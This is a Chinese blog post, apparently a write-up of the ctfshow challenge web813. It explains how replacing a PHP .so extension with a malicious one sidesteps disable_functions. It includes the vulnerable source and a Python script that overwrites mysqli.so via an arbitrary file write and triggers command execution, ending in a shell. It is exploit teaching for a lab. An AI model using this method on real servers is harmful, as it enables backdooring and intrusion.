<!DOCTYPE html>
<html lang=en>
<head>
    <!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=5" />
    <meta name="description" content="用恶意so替换php扩展so的条件：1.扩展目录已知且可写（扩展目录一般在phpinfo里看） 2.能够载入我们的恶意so文件（重启php-fpm或者能使用php命令行） 3.源码中有调用我们自定义函数的代码，如shell_exec(&quot;php -r &#39;backdoor();&#39;&quot;); 参考链接https:&#x2F;&#x2F;www.bilibili.com&#x2F;video&#x2F;BV1XT">
<meta property="og:type" content="article">
<meta property="og:title" content="php恶意so绕disable_functions">
<meta property="og:url" content="http://example.com/2024/09/16/php%E6%81%B6%E6%84%8Fso%E7%BB%95disable-functions/index.html">
<meta property="og:site_name" content="K1ato&#39;s blog">
<meta property="og:description" content="用恶意so替换php扩展so的条件：1.扩展目录已知且可写（扩展目录一般在phpinfo里看） 2.能够载入我们的恶意so文件（重启php-fpm或者能使用php命令行） 3.源码中有调用我们自定义函数的代码，如shell_exec(&quot;php -r &#39;backdoor();&#39;&quot;); 参考链接https:&#x2F;&#x2F;www.bilibili.com&#x2F;video&#x2F;BV1XT">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="http://example.com/2024/09/16/php%E6%81%B6%E6%84%8Fso%E7%BB%95disable-functions/1.PNG">
<meta property="og:image" content="http://example.com/2024/09/16/php%E6%81%B6%E6%84%8Fso%E7%BB%95disable-functions/0.PNG">
<meta property="og:image" content="http://example.com/2024/09/16/php%E6%81%B6%E6%84%8Fso%E7%BB%95disable-functions/11.PNG">
<meta property="og:image" content="http://example.com/2024/09/16/php%E6%81%B6%E6%84%8Fso%E7%BB%95disable-functions/2.PNG">
<meta property="og:image" content="http://example.com/2024/09/16/php%E6%81%B6%E6%84%8Fso%E7%BB%95disable-functions/3.PNG">
<meta property="og:image" content="http://example.com/2024/09/16/php%E6%81%B6%E6%84%8Fso%E7%BB%95disable-functions/4.PNG">
<meta property="article:published_time" content="2024-09-16T08:10:52.000Z">
<meta property="article:modified_time" content="2024-09-24T05:49:24.593Z">
<meta property="article:author" content="k1ato">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://example.com/2024/09/16/php%E6%81%B6%E6%84%8Fso%E7%BB%95disable-functions/1.PNG">
    
    
      
        
          <link rel="shortcut icon" href="/images/favicon.ico">
        
      
      
        
          <link rel="icon" type="image/png" href="/images/favicon-192x192.png" sizes="192x192">
        
      
      
        
          <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">
        
      
    
    <!-- title -->
    <title>php恶意so绕disable_functions</title>
    <!-- async scripts -->
    <!-- Google Analytics -->


    <!-- Umami Analytics -->


    <!-- styles -->
    
<link rel="stylesheet" href="/css/style.css">

    <!-- persian styles -->
    
    <!-- rss -->
    
    
	<!-- mathjax -->
	
<meta name="generator" content="Hexo 6.3.0"></head>

<body class="max-width mx-auto px3 ltr">
    
      <div id="header-post">
  <a id="menu-icon" href="#" aria-label="Menu"><i class="fa-solid fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#" aria-label="Menu"><i class="fa-solid fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" aria-label="Top" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fa-solid fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
        <!--
       --><li><a href="/">Home</a></li><!--
     --><!--
       --><li><a href="/about">About</a></li><!--
     --><!--
       --><li><a href="/archives/">Writing</a></li><!--
     -->
      </ul>
    </span>
    <br/>
    <span id="actions">
      <ul>
        
        <li><a class="icon" aria-label="Previous post" href="/2024/09/17/%E9%99%87%E5%8E%9F%E6%9D%AF-eaaasyphp/"><i class="fa-solid fa-chevron-left" aria-hidden="true" onmouseover="$('#i-prev').toggle();" onmouseout="$('#i-prev').toggle();"></i></a></li>
        
        
        <li><a class="icon" aria-label="Next post" href="/2024/09/15/file-put-contens%E6%89%93ftp%E8%BD%ACphp-fpm/"><i class="fa-solid fa-chevron-right" aria-hidden="true" onmouseover="$('#i-next').toggle();" onmouseout="$('#i-next').toggle();"></i></a></li>
        
        <li><a class="icon" aria-label="Back to top" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fa-solid fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
        <li><a class="icon" aria-label="Share post" href="#"><i class="fa-solid fa-share-alt" aria-hidden="true" onmouseover="$('#i-share').toggle();" onmouseout="$('#i-share').toggle();" onclick="$('#share').toggle();return false;"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">Previous post</span>
      <span id="i-next" class="info" style="display:none;">Next post</span>
      <span id="i-top" class="info" style="display:none;">Back to top</span>
      <span id="i-share" class="info" style="display:none;">Share post</span>
    </span>
    <br/>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=http://example.com/2024/09/16/php%E6%81%B6%E6%84%8Fso%E7%BB%95disable-functions/"><i class="fab fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=http://example.com/2024/09/16/php%E6%81%B6%E6%84%8Fso%E7%BB%95disable-functions/&text=php恶意so绕disable_functions"><i class="fab fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=http://example.com/2024/09/16/php%E6%81%B6%E6%84%8Fso%E7%BB%95disable-functions/&title=php恶意so绕disable_functions"><i class="fab fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=http://example.com/2024/09/16/php%E6%81%B6%E6%84%8Fso%E7%BB%95disable-functions/&is_video=false&description=php恶意so绕disable_functions"><i class="fab fa-pinterest " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=php恶意so绕disable_functions&body=Check out this article: http://example.com/2024/09/16/php%E6%81%B6%E6%84%8Fso%E7%BB%95disable-functions/"><i class="fa-solid fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=http://example.com/2024/09/16/php%E6%81%B6%E6%84%8Fso%E7%BB%95disable-functions/&title=php恶意so绕disable_functions"><i class="fab fa-get-pocket " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=http://example.com/2024/09/16/php%E6%81%B6%E6%84%8Fso%E7%BB%95disable-functions/&title=php恶意so绕disable_functions"><i class="fab fa-reddit " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=http://example.com/2024/09/16/php%E6%81%B6%E6%84%8Fso%E7%BB%95disable-functions/&title=php恶意so绕disable_functions"><i class="fab fa-stumbleupon " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=http://example.com/2024/09/16/php%E6%81%B6%E6%84%8Fso%E7%BB%95disable-functions/&title=php恶意so绕disable_functions"><i class="fab fa-digg " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=http://example.com/2024/09/16/php%E6%81%B6%E6%84%8Fso%E7%BB%95disable-functions/&name=php恶意so绕disable_functions&description="><i class="fab fa-tumblr " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=http://example.com/2024/09/16/php%E6%81%B6%E6%84%8Fso%E7%BB%95disable-functions/&t=php恶意so绕disable_functions"><i class="fab fa-hacker-news " aria-hidden="true"></i></a></li>
</ul>

    </div>
    
    
      <div id="toc">
        <ol class="toc"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E7%94%A8%E6%81%B6%E6%84%8Fso%E6%9B%BF%E6%8D%A2php%E6%89%A9%E5%B1%95so%E7%9A%84%E6%9D%A1%E4%BB%B6%EF%BC%9A"><span class="toc-number">1.</span> <span class="toc-text">用恶意so替换php扩展so的条件：</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%8F%82%E8%80%83%E9%93%BE%E6%8E%A5"><span class="toc-number">2.</span> <span class="toc-text">参考链接</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E4%BB%80%E4%B9%88%E6%98%AFso%E6%96%87%E4%BB%B6"><span class="toc-number">3.</span> <span class="toc-text">什么是so文件</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E9%BB%98%E8%AE%A4%E6%89%A9%E5%B1%95%E7%9B%AE%E5%BD%95%E9%83%BD%E6%9C%89%E4%BB%80%E4%B9%88so%E6%96%87%E4%BB%B6%E5%91%A2%EF%BC%9F"><span class="toc-number">4.</span> <span class="toc-text">默认扩展目录都有什么so文件呢？</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#php%E5%AE%9E%E4%BE%8B%E5%8C%96%E4%B8%80%E4%B8%AA%E7%B1%BB%E5%AF%B9%E8%B1%A1%E7%9A%84%E8%BF%87%E7%A8%8B%EF%BC%9A"><span class="toc-number">5.</span> <span class="toc-text">php实例化一个类对象的过程：</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%81%B6%E6%84%8Fso%E6%96%87%E4%BB%B6"><span class="toc-number">6.</span> <span class="toc-text">恶意so文件</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E4%B8%BA%E4%BB%80%E4%B9%88%E6%81%B6%E6%84%8Fso%E6%96%87%E4%BB%B6%E8%83%BD%E7%BB%95%E8%BF%87disable-functons%EF%BC%9F"><span class="toc-number">7.</span> <span class="toc-text">为什么恶意so文件能绕过disable_functons？</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%A6%82%E4%BD%95%E7%94%9F%E6%88%90so%E6%96%87%E4%BB%B6%EF%BC%9F"><span class="toc-number">8.</span> <span class="toc-text">如何生成so文件？</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#web813"><span class="toc-number">9.</span> <span class="toc-text">web813</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E8%A7%A3%E9%A2%98%E6%B5%81%E7%A8%8B%EF%BC%9A"><span class="toc-number">10.</span> <span class="toc-text">解题流程：</span></a></li></ol>
      </div>
    
  </span>
</div>

    
    <div class="content index py4 ">
        
        <article class="post h-entry" itemscope itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle p-name" itemprop="name headline">
        php恶意so绕disable_functions
    </h1>



    <div class="meta">
      <span class="author p-author h-card" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span class="p-name" itemprop="name">k1ato</span>
      </span>
      
    <div class="postdate">
      
        <time datetime="2024-09-16T08:10:52.000Z" class="dt-published" itemprop="datePublished">2024-09-16</time>
        
      
    </div>


      

      

    </div>
  </header>
  

  <div class="content e-content" itemprop="articleBody">
    <h3 id="用恶意so替换php扩展so的条件："><a href="#用恶意so替换php扩展so的条件：" class="headerlink" title="用恶意so替换php扩展so的条件："></a>用恶意so替换php扩展so的条件：</h3><p>1.扩展目录已知且可写（扩展目录一般在phpinfo里看）</p>
<p>2.能够载入我们的恶意so文件（重启php-fpm或者能使用php命令行）</p>
<p>3.源码中有调用我们自定义函数的代码，如<code>shell_exec(&quot;php -r &#39;backdoor();&#39;&quot;);</code></p>
<h3 id="参考链接"><a href="#参考链接" class="headerlink" title="参考链接"></a>参考链接</h3><p><a target="_blank" rel="noopener" href="https://www.bilibili.com/video/BV1XT4y1h7Th/?spm_id_from=333.999.0.0&vd_source=ddab59a2223290fb9ed7af04a32cf94d">https://www.bilibili.com/video/BV1XT4y1h7Th/?spm_id_from=333.999.0.0&amp;vd_source=ddab59a2223290fb9ed7af04a32cf94d</a></p>
<h3 id="什么是so文件"><a href="#什么是so文件" class="headerlink" title="什么是so文件"></a>什么是so文件</h3><p>so文件是linux下的一种文件格式，是<code>shared object</code>的缩写。可以简单的理解为so是将一系列c函数包装到一个文件中，方便其他二进制文件调用的一个函数包。</p>
<p>我们可以自定义扩展，并把它加入到php的解释器中，这里的扩展就是so文件，同时，如果没有指定扩展（默认情况），就会去默认的扩展目录里加载所有扩展。默认目录在phpinfo中<code>extension_dir</code>项查看。</p>
<h3 id="默认扩展目录都有什么so文件呢？"><a href="#默认扩展目录都有什么so文件呢？" class="headerlink" title="默认扩展目录都有什么so文件呢？"></a>默认扩展目录都有什么so文件呢？</h3><p>有mysql.so、opcache.so、pdo_mysql.so、sodium.so等，这些so文件都是用c语言编写的二进制文件，用来声明一些函数并完成函数的调用。</p>
<p>举个例子，我们经常使用的php连接mysql，使用下面的代码完成：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">......</span><br><span class="line">$conn = new mysqli($servername, $username, $password);</span><br><span class="line">......</span><br></pre></td></tr></table></figure>

<p>这里使用的mysqli类，就是来自mysqli.so文件。</p>
<h3 id="php实例化一个类对象的过程："><a href="#php实例化一个类对象的过程：" class="headerlink" title="php实例化一个类对象的过程："></a>php实例化一个类对象的过程：</h3><p>php脚本在实例化一个类时，会先在本脚本和包含的脚本内找这个类，如找不到，则会去扩展目录找so文件，在so文件里查找是否有该类的定义。</p>
<h3 id="恶意so文件"><a href="#恶意so文件" class="headerlink" title="恶意so文件"></a>恶意so文件</h3><p>就是在so文件里对应类的定义中添加了恶意代码，如执行system命令。</p>
<img src="/2024/09/16/php%E6%81%B6%E6%84%8Fso%E7%BB%95disable-functions/1.PNG" class="">




<h3 id="为什么恶意so文件能绕过disable-functons？"><a href="#为什么恶意so文件能绕过disable-functons？" class="headerlink" title="为什么恶意so文件能绕过disable_functons？"></a>为什么恶意so文件能绕过disable_functons？</h3><p>准确的说，并没有绕过php的disable_functions，只是没有执行php禁用的函数，那么自然就能顺利执行。</p>
<p>php禁用的system函数，是php的语言函数，而恶意so里的system函数，是c语言库中的函数。</p>
<h3 id="如何生成so文件？"><a href="#如何生成so文件？" class="headerlink" title="如何生成so文件？"></a>如何生成so文件？</h3><p>使用php源码包中的ext_skel框架（专门用来自定义扩展的框架），在<code>/usr/src/php/ext</code>目录下有个ext_skel.php文件，生成命令也很简单：<code>php ext_skel.php --ext Backdoor --author kato --std</code></p>
<h3 id="web813"><a href="#web813" class="headerlink" title="web813"></a>web813</h3><p>源码：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">error_reporting(0);</span><br><span class="line"></span><br><span class="line">$action = $_GET[&#x27;a&#x27;];</span><br><span class="line">switch ($action) &#123;</span><br><span class="line">    case &#x27;phpinfo&#x27;:</span><br><span class="line">        phpinfo();</span><br><span class="line">        break;</span><br><span class="line">    </span><br><span class="line">    case &#x27;write&#x27;:</span><br><span class="line">        file_put_contents($_POST[&#x27;file&#x27;],$_POST[&#x27;content&#x27;]);</span><br><span class="line">        break;</span><br><span class="line"></span><br><span class="line">    case &#x27;run&#x27;:</span><br><span class="line">        shell_exec(&quot;php -r &#x27;ctfshow();&#x27;&quot;);</span><br><span class="line">        break;</span><br><span class="line"></span><br><span class="line">    default:</span><br><span class="line">        highlight_file(__FILE__);</span><br><span class="line">        break;</span><br><span class="line">&#125; </span><br></pre></td></tr></table></figure>

<p>分析：有phpinfo（知道扩展目录）、能写文件、执行了<code>ctfshow()</code>函数，很明显这个函数并未在脚本中定义，php会从扩展so文件中去找是否有该函数定义。</p>
<p>思路就是本地生成一个so扩展，然后上传替换服务器的mysqli.so扩展。</p>
<h3 id="解题流程："><a href="#解题流程：" class="headerlink" title="解题流程："></a>解题流程：</h3><p>1.先看一下服务器上的php扩展目录：</p>
<img src="/2024/09/16/php%E6%81%B6%E6%84%8Fso%E7%BB%95disable-functions/0.PNG" class="">

<p>2.本地生成一个ctfshow.so: <code>php ext_skel.php --ext ctfshow --std</code></p>
<p>进入ctfshow目录，修改ctfshow.c文件，两处修改：</p>
<hr>
<img src="/2024/09/16/php%E6%81%B6%E6%84%8Fso%E7%BB%95disable-functions/11.PNG" class="">

<hr>
<img src="/2024/09/16/php%E6%81%B6%E6%84%8Fso%E7%BB%95disable-functions/2.PNG" class="">

<hr>
<p>3.修改完后，执行以下命令生成so文件：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">phpize</span><br><span class="line">./configure</span><br><span class="line">make &amp;&amp; make install</span><br></pre></td></tr></table></figure>

<p>生成完后会告诉so文件在哪个位置：</p>
<img src="/2024/09/16/php%E6%81%B6%E6%84%8Fso%E7%BB%95disable-functions/3.PNG" class="">

<p>5.用ctfshow.so替换mysqli.so：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">import requests</span><br><span class="line">url=&quot;http://d5327f2a-7075-426c-ae74-4da580793e5a.challenge.ctf.show/&quot;</span><br><span class="line">data=&#123;&#x27;file&#x27;:&#x27;/usr/local/lib/php/extensions/no-debug-non-zts-20180731/mysqli.so&#x27;,&#x27;content&#x27;:open(&#x27;ctfshow.so&#x27;,&#x27;rb&#x27;).read()&#125;</span><br><span class="line">requests.post(url+&#x27;?a=write&#x27;,data=data)</span><br><span class="line">requests.get(url+&#x27;?a=run&#x27;)</span><br></pre></td></tr></table></figure>

<p>服务器上接收到了shell：</p>
<img src="/2024/09/16/php%E6%81%B6%E6%84%8Fso%E7%BB%95disable-functions/4.PNG" class="">

  </div>
</article>



        
          <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
        
          <li><a href="/">Home</a></li>
        
          <li><a href="/about">About</a></li>
        
          <li><a href="/archives/">Writing</a></li>
        
      </ul>
    </div>

    
    
      <div id="toc-footer" style="display: none">
        <ol class="toc"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E7%94%A8%E6%81%B6%E6%84%8Fso%E6%9B%BF%E6%8D%A2php%E6%89%A9%E5%B1%95so%E7%9A%84%E6%9D%A1%E4%BB%B6%EF%BC%9A"><span class="toc-number">1.</span> <span class="toc-text">用恶意so替换php扩展so的条件：</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%8F%82%E8%80%83%E9%93%BE%E6%8E%A5"><span class="toc-number">2.</span> <span class="toc-text">参考链接</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E4%BB%80%E4%B9%88%E6%98%AFso%E6%96%87%E4%BB%B6"><span class="toc-number">3.</span> <span class="toc-text">什么是so文件</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E9%BB%98%E8%AE%A4%E6%89%A9%E5%B1%95%E7%9B%AE%E5%BD%95%E9%83%BD%E6%9C%89%E4%BB%80%E4%B9%88so%E6%96%87%E4%BB%B6%E5%91%A2%EF%BC%9F"><span class="toc-number">4.</span> <span class="toc-text">默认扩展目录都有什么so文件呢？</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#php%E5%AE%9E%E4%BE%8B%E5%8C%96%E4%B8%80%E4%B8%AA%E7%B1%BB%E5%AF%B9%E8%B1%A1%E7%9A%84%E8%BF%87%E7%A8%8B%EF%BC%9A"><span class="toc-number">5.</span> <span class="toc-text">php实例化一个类对象的过程：</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%81%B6%E6%84%8Fso%E6%96%87%E4%BB%B6"><span class="toc-number">6.</span> <span class="toc-text">恶意so文件</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E4%B8%BA%E4%BB%80%E4%B9%88%E6%81%B6%E6%84%8Fso%E6%96%87%E4%BB%B6%E8%83%BD%E7%BB%95%E8%BF%87disable-functons%EF%BC%9F"><span class="toc-number">7.</span> <span class="toc-text">为什么恶意so文件能绕过disable_functons？</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%A6%82%E4%BD%95%E7%94%9F%E6%88%90so%E6%96%87%E4%BB%B6%EF%BC%9F"><span class="toc-number">8.</span> <span class="toc-text">如何生成so文件？</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#web813"><span class="toc-number">9.</span> <span class="toc-text">web813</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E8%A7%A3%E9%A2%98%E6%B5%81%E7%A8%8B%EF%BC%9A"><span class="toc-number">10.</span> <span class="toc-text">解题流程：</span></a></li></ol>
      </div>
    

    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=http://example.com/2024/09/16/php%E6%81%B6%E6%84%8Fso%E7%BB%95disable-functions/"><i class="fab fa-facebook fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=http://example.com/2024/09/16/php%E6%81%B6%E6%84%8Fso%E7%BB%95disable-functions/&text=php恶意so绕disable_functions"><i class="fab fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=http://example.com/2024/09/16/php%E6%81%B6%E6%84%8Fso%E7%BB%95disable-functions/&title=php恶意so绕disable_functions"><i class="fab fa-linkedin fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=http://example.com/2024/09/16/php%E6%81%B6%E6%84%8Fso%E7%BB%95disable-functions/&is_video=false&description=php恶意so绕disable_functions"><i class="fab fa-pinterest fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=php恶意so绕disable_functions&body=Check out this article: http://example.com/2024/09/16/php%E6%81%B6%E6%84%8Fso%E7%BB%95disable-functions/"><i class="fa-solid fa-envelope fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=http://example.com/2024/09/16/php%E6%81%B6%E6%84%8Fso%E7%BB%95disable-functions/&title=php恶意so绕disable_functions"><i class="fab fa-get-pocket fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=http://example.com/2024/09/16/php%E6%81%B6%E6%84%8Fso%E7%BB%95disable-functions/&title=php恶意so绕disable_functions"><i class="fab fa-reddit fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=http://example.com/2024/09/16/php%E6%81%B6%E6%84%8Fso%E7%BB%95disable-functions/&title=php恶意so绕disable_functions"><i class="fab fa-stumbleupon fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=http://example.com/2024/09/16/php%E6%81%B6%E6%84%8Fso%E7%BB%95disable-functions/&title=php恶意so绕disable_functions"><i class="fab fa-digg fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=http://example.com/2024/09/16/php%E6%81%B6%E6%84%8Fso%E7%BB%95disable-functions/&name=php恶意so绕disable_functions&description="><i class="fab fa-tumblr fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=http://example.com/2024/09/16/php%E6%81%B6%E6%84%8Fso%E7%BB%95disable-functions/&t=php恶意so绕disable_functions"><i class="fab fa-hacker-news fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
        <a id="menu" class="icon" href="#" onclick="$('#nav-footer').toggle();return false;"><i class="fa-solid fa-bars fa-lg" aria-hidden="true"></i> Menu</a>
        
          <a id="toc" class="icon" href="#" onclick="$('#toc-footer').toggle();return false;"><i class="fa-solid fa-list fa-lg" aria-hidden="true"></i> TOC</a>
        
        <a id="share" class="icon" href="#" onclick="$('#share-footer').toggle();return false;"><i class="fa-solid fa-share-alt fa-lg" aria-hidden="true"></i> Share</a>
        <a id="top" style="display:none" class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fa-solid fa-chevron-up fa-lg" aria-hidden="true"></i> Top</a>
    </div>

  </div>
</div>

        
        <footer id="footer">
  <div class="footer-left">
    Copyright &copy;
    
    
    2016-2024
    k1ato
  </div>
  <div class="footer-right">
    <nav>
      <ul>
        <!--
       --><li><a href="/">Home</a></li><!--
     --><!--
       --><li><a href="/about">About</a></li><!--
     --><!--
       --><li><a href="/archives/">Writing</a></li><!--
     -->
      </ul>
    </nav>
  </div>
</footer>

    </div>
    <!-- styles -->



  <link rel="preload" as="style" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css" crossorigin="anonymous" onload="this.onload=null;this.rel='stylesheet'"/>


    <!-- jquery -->

  <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js" crossorigin="anonymous"></script>




<!-- clipboard -->

  
    <script src="https://cdnjs.cloudflare.com/ajax/libs/clipboard.js/2.0.7/clipboard.min.js" crossorigin="anonymous"></script>
  
  <script type="text/javascript">
  $(function() {
    // copy-btn HTML
    var btn = "<span class=\"btn-copy tooltipped tooltipped-sw\" aria-label=\"Copy to clipboard!\">";
    btn += '<i class="fa-regular fa-clone"></i>';
    btn += '</span>';
    // mount it!
    $(".highlight table").before(btn);
    var clip = new ClipboardJS('.btn-copy', {
      text: function(trigger) {
        return Array.from(trigger.nextElementSibling.querySelectorAll('.code')).reduce((str,it)=>str+it.innerText+'\n','')
      }
    });
    clip.on('success', function(e) {
      e.trigger.setAttribute('aria-label', "Copied!");
      e.clearSelection();
    })
  })
  </script>


<script src="/js/main.js"></script>

<!-- search -->

<!-- Baidu Analytics -->

<!-- Cloudflare Analytics -->

<!-- Disqus Comments -->

<!-- utterances Comments -->

</body>
</html>
